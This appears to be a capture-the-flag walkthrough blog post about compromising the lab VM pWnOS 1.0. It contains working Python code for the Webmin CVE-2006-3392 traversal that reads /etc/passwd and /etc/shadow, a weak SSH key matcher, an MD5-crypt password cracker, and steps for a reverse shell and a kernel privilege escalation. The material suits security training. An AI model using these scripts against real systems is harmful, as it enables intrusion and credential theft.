Tuesday, December 11, 2018

pWnOS 1.0


- Layout for this exercise:


- The goal of this exercise is to develop a hacking process for the vulnerable machine pWnOS 1.0

pWnOS 1.0 can be downloaded from here:,33/

- Once pWnOS 1.0 has been downloaded and extracted, it is opened with VMware:


- Discovering the IP of pWnOS 1.0:

- Scanning ports with Nmap:

- Launching Nikto against the web server at port 80:

- Going to folder /php, detected by nikto:

- Clicking phpMyAdmin:

- Now, launching dirb:

- Connecting to folder /index:

- Clicking Next:

- Clicking Please Help!:


- There are several ways to exploit this vulnerable machine. Let's study some of them:

3.1 - File Inclusion

- Going back to index1.php, entering false instead of true produces a PHP Warning message from the include() function:

- This points to a possible File Inclusion vulnerability, which in fact allows reading the file /etc/passwd:

3.2 - Webmin exploitation

- Going back to port 10000, according to Nmap's output Webmin is running there (MiniServ 0.01):

- Looking for Webmin exploits:

- Copying the exploit to the local working directory:

- Running it without parameters:

- Getting /etc/passwd:

- Getting /etc/shadow:

3.3 - PRNG Brute Force SSH

- The same exploit as in 3.2 can be used again, in combination with either of these two other exploits (one in Perl, one in Python):

- According to the instructions, first we must download the exploit and store it:

- Extracting it, we find the precalculated SSH keys:


- Following the instructions (in our case using the Perl script instead of the Python one):

- Using the script from point 3.2 to get the authorized_keys file of user obama (obviously the same could be done for the other users vmware, osama and yosama):

- Searching for obama's public key by grepping the contents of authorized_keys against the folder /rsa/2048 of the precalculated key set:

- The matching private key for user obama is found:

- SSH-ing as user obama with that private key, we get a low-privileged remote shell:
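The key lookup above is a grep of the base64 blob from authorized_keys over the precalculated set. The following Python script does the same match programmatically and reports which private key file logs in as which user. It is an added example for this write-up, not the exploit-db script and not the precalculated key set itself; it assumes the set is laid out as a directory of private key files with a matching `<name>.pub` beside each one, and the key blobs it builds are constructed placeholders rather than real RSA keys.

```python
"""Match authorized_keys entries against a set of precomputed (predictable-PRNG) SSH keys.

Added example for this write-up; not the exploit-db script nor the key set itself.
Assumed layout of the set: <dir>/<name> (private key) next to <dir>/<name>.pub.
The key blobs produced by _fake_blob() are constructed stand-ins, not real keys.
"""
import base64
import hashlib
import tempfile
from pathlib import Path


def parse_pubkey(line: str):
    """Return (keytype, blob, comment) for an OpenSSH public-key line, else None.

    Comments (and leading options such as from="...") differ between files, so only
    the key type plus the base64 blob identify a key, exactly what the grep matches on.
    """
    parts = line.strip().split()
    for i, p in enumerate(parts[:-1]):
        if p.startswith(("ssh-", "ecdsa-")):
            return p, parts[i + 1], " ".join(parts[i + 2:])
    return None


def index_keyset(directory) -> dict:
    """Map (keytype, blob) -> private key path for every *.pub in the precomputed set."""
    index = {}
    for pub in Path(directory).glob("*.pub"):
        for line in pub.read_text().splitlines():
            key = parse_pubkey(line)
            if key:
                index[(key[0], key[1])] = pub.with_suffix("")
    return index


def find_weak_keys(authorized_keys: str, index: dict) -> list:
    """Every authorized_keys entry whose public key is in the set, with the private key
    that will be accepted for it: (keytype, comment, private_key_path)."""
    hits = []
    for line in authorized_keys.splitlines():
        key = parse_pubkey(line)
        if key and (key[0], key[1]) in index:
            hits.append((key[0], key[2], index[(key[0], key[1])]))
    return hits


def _fake_blob(label: str) -> str:
    """Constructed stand-in for an RSA key blob: SSH wire framing with a fake modulus."""
    body = (b"\x00\x00\x00\x07ssh-rsa" + b"\x00\x00\x00\x03\x01\x00\x01"
            + b"\x00\x00\x00\x20" + hashlib.sha256(label.encode()).digest())
    return base64.b64encode(body).decode()


def demo() -> list:
    """Build a constructed key set plus an authorized_keys file and run the match."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d) / "rsa" / "2048"
        root.mkdir(parents=True)
        for name in ("weak-2048-1234", "weak-2048-4567", "weak-2048-8910"):
            (root / name).write_text("-----BEGIN RSA PRIVATE KEY-----\n(constructed)\n"
                                     "-----END RSA PRIVATE KEY-----\n")
            (root / (name + ".pub")).write_text(f"ssh-rsa {_fake_blob(name)} root@debian\n")
        # Constructed authorized_keys: one key from the weak set, one that is not.
        authorized_keys = (f"ssh-rsa {_fake_blob('weak-2048-4567')} obama@pwnos\n"
                           f"ssh-rsa {_fake_blob('strong-key')} admin@elsewhere\n")
        hits = find_weak_keys(authorized_keys, index_keyset(root))
        return [(ktype, comment, path.name) for ktype, comment, path in hits]


if __name__ == "__main__":
    for ktype, comment, name in demo():
        print(f"{comment}: weak {ktype} key, log in with  ssh -i rsa/2048/{name} <user>@<target>")
```

Only the blob is compared, never the comment: the comment in authorized_keys is whatever the key's owner typed, so grepping for a user name would miss a key that was generated on a different host.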

3.4 - File disclosure with Metasploit

- CVE-2006-3392 describes a vulnerability associated with Webmin:

- Metasploit has a module for CVE-2006-3392:

- Launching Metasploit and using the auxiliary module auxiliary/admin/webmin/file_disclosure:

- Setting option for RHOST:

- Setting the target file option to /etc/passwd and running:

- Setting the target file option to /etc/shadow and running:

3.5 - Path / Directory traversal attack

- Following the CVE-2006-3392 description, which mentions "..%01" sequences, we can also read /etc/passwd and /etc/shadow by hand with a path (directory) traversal attack:

- Path traversal attack for /etc/passwd:

- Path traversal attack for /etc/shadow:
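The exploit-db script, the Metasploit module and the manual traversal above all send the same request shape. The following Python script, added here as an example (it is not the exploit-db script nor Metasploit's module), builds that URL, checks that the response is really the requested file rather than the Webmin login page, and picks out the accounts worth cracking. The target address, the traversal depth and the /etc/passwd excerpt are constructed assumptions.

```python
"""Webmin/Usermin file disclosure (CVE-2006-3392): request builder and response check.

Added example for this write-up; not the exploit-db script nor Metasploit's
auxiliary/admin/webmin/file_disclosure module. Per the CVE description, miniserv.pl
removes "../" sequences from the requested path before it strips bytes such as %01,
so every "..%01/" survives the filter and only afterwards collapses to "../".
Content under /unauthenticated/ is served without a login, hence no credentials.
"""
import re
import sys
import urllib.request


def traversal_url(host: str, port: int, target: str, depth: int = 8) -> str:
    """Build http://host:port/unauthenticated/..%01/..%01/.../<target>.

    `depth` is an assumption: it only has to exceed the nesting of Webmin's install
    directory on disk, because further ".." steps stop at "/".
    """
    return (f"http://{host}:{port}/unauthenticated"
            + "/..%01" * depth
            + "/" + target.lstrip("/"))


# Seven fields with numeric uid/gid; nine fields for shadow.
PASSWD_RE = re.compile(r"^[^:\s]+:[^:]*:\d+:\d+:[^:]*:[^:]*:[^:]*$")
SHADOW_RE = re.compile(r"^[^:\s]+:[^:]*:\d*:\d*:\d*:\d*:\d*:\d*:[^:]*$")


def looks_like(body: str, pattern: re.Pattern) -> bool:
    """Reject the HTML login form miniserv returns when the bypass does not work."""
    lines = [ln for ln in body.splitlines() if ln.strip()]
    return bool(lines) and all(pattern.match(ln) for ln in lines)


NOLOGIN = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}


def interactive_users(passwd_text: str) -> list:
    """root plus regular accounts with a usable shell: the ones worth cracking."""
    users = []
    for ln in passwd_text.splitlines():
        f = ln.split(":")
        if len(f) != 7:
            continue
        uid, shell = int(f[2]), f[6]
        if shell not in NOLOGIN and (uid == 0 or 1000 <= uid < 60000):
            users.append(f[0])
    return users


# Constructed /etc/passwd excerpt (user names as on the target, uids assumed).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001:,,,:/home/obama:/bin/bash
"""


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.10"   # assumed target address
    url = traversal_url(host, 10000, "/etc/passwd")
    body = urllib.request.urlopen(url, timeout=10).read().decode("utf-8", "replace")
    if looks_like(body, PASSWD_RE):
        print("accounts worth cracking:", interactive_users(body))
    else:
        print("bypass failed; response starts with:", body[:80])
```

The same `traversal_url` call with `/etc/shadow` and `SHADOW_RE` fetches the hashes; Webmin's miniserv runs as root, which is why /etc/shadow is readable at all through this bug.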


- John the Ripper helps us crack the password hashes once /etc/passwd and /etc/shadow are combined:

- First, let's store /etc/passwd in file p and /etc/shadow in file s:

- Now, the unshadow command takes p and s and writes the combined file u:

- It is time for john to work on file u, using the wordlist rockyou.txt:

- After some minutes we get the password for user vmware.
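What unshadow and john do in those three steps, as an added example for this write-up (not John the Ripper's own code): merge the shadow hash into the passwd record, then run each wordlist entry through the hash function with the stored salt until one matches. It assumes the shadow hashes are MD5-crypt (`$1$...`), the scheme Ubuntu used in the pWnOS 1.0 era; the passwd/shadow lines, the salts and the wordlist are constructed, with the vmware password set to the one found above.

```python
"""unshadow + wordlist attack on MD5-crypt ($1$) hashes.

Added example for this write-up, not John the Ripper's code. Assumption: the target's
shadow hashes are MD5-crypt. Sample passwd/shadow lines and the wordlist are constructed.
"""
import hashlib

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> bytes:
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password: str, salt: str) -> str:
    """MD5-crypt (the "$1$" scheme): 1000 MD5 rounds keyed on password and salt."""
    pw = password.encode()
    if salt.startswith("$1$"):
        salt = salt[3:]
    sp = salt.split("$", 1)[0][:8].encode()      # at most 8 salt characters
    magic = b"$1$"
    ctx = hashlib.md5(pw + magic + sp)
    alt = hashlib.md5(pw + sp + pw).digest()
    n = len(pw)
    while n > 0:                                  # mix in `alt`, len(pw) bytes total
        ctx.update(alt[:min(16, n)])
        n -= 16
    n = len(pw)
    while n:                                      # one byte per bit of len(pw)
        ctx.update(b"\x00" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):                         # the deliberately slow part
        r = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            r.update(sp)
        if i % 7:
            r.update(pw)
        r.update(final if i & 1 else pw)
        final = r.digest()
    f = final
    enc = (_to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
           + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
           + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
           + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
           + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
           + _to64(f[11], 2))
    return (magic + sp + b"$" + enc).decode()


def unshadow(passwd_text: str, shadow_text: str) -> str:
    """Same merge as `unshadow p s`: put the shadow hash into passwd's second field."""
    hashes = {}
    for ln in shadow_text.splitlines():
        if ":" in ln:
            user, h = ln.split(":", 2)[:2]
            hashes[user] = h
    merged = []
    for ln in passwd_text.splitlines():
        f = ln.split(":")
        if len(f) >= 2 and f[0] in hashes:
            f[1] = hashes[f[0]]
        merged.append(":".join(f))
    return "\n".join(merged)


def crack(unshadowed: str, wordlist) -> dict:
    """Wordlist attack on every $1$ entry, what `john --wordlist=... u` does for this format."""
    found = {}
    words = list(wordlist)
    for ln in unshadowed.splitlines():
        f = ln.split(":")
        if len(f) < 2 or not f[1].startswith("$1$"):
            continue                              # locked ('*', '!') or another hash type
        user, h = f[0], f[1]
        salt = h.split("$")[2]
        for word in words:
            if md5crypt(word, salt) == h:
                found[user] = word
                break
    return found


# Constructed sample data (salts chosen here; vmware's password is the one found above).
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash\n"
                 "obama:x:1001:1001:,,,:/home/obama:/bin/bash\n")
SAMPLE_SHADOW = ("root:" + md5crypt("notinthelist", "Zq1v9Xw7") + ":14000:0:99999:7:::\n"
                 "vmware:" + md5crypt("h4ckm3", "pWnOS1x0") + ":14000:0:99999:7:::\n"
                 "obama:!:14000:0:99999:7:::\n")
WORDLIST = ["123456", "password", "qwerty", "letmein", "h4ckm3", "monkey"]


def demo() -> dict:
    return crack(unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW), WORDLIST)


if __name__ == "__main__":
    print(demo())
```

The thousand MD5 rounds per guess are the only thing slowing this down; against rockyou.txt that is why john needs minutes here, and why a modern sha512crypt or bcrypt hash with a bigger cost factor would turn the same attack into days.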

- SSH-ing with the credentials vmware:h4ckm3 we get a low-privileged remote shell:

- Unfortunately user vmware has no sudo privileges:


- Let's follow two ways to achieve Privilege Escalation.

5.1 - Webshell

- Copying a Perl reverse shell to the local working folder:

- Renaming it to shell.cgi so that it can be run as a CGI script:

- Adapting shell.cgi to our needs:

- Transferring from Kali to pWnOS 1.0 (folder /tmp):

- Copying from /tmp to /home/vmware:

- Setting execute permissions on shell.cgi:

- Starting a Netcat listener on Kali:

- Running shell.cgi:

- As a result we get a root shell:

5.2 - Kernel exploit

- Another way to escalate privileges is to take advantage of the outdated kernel version:

- Exploit Database holds Local Privilege Escalation exploits for outdated Linux kernel versions; for instance this one would be valid because 2.6.17 < 2.6.22 <

- Downloading it to the working folder and naming it vmsplice.c:

- Setting execution permissions:

- Transferring from Kali to pWnOS 1.0 (/tmp folder):

- Compiling:

- Running the exploit, it succeeds: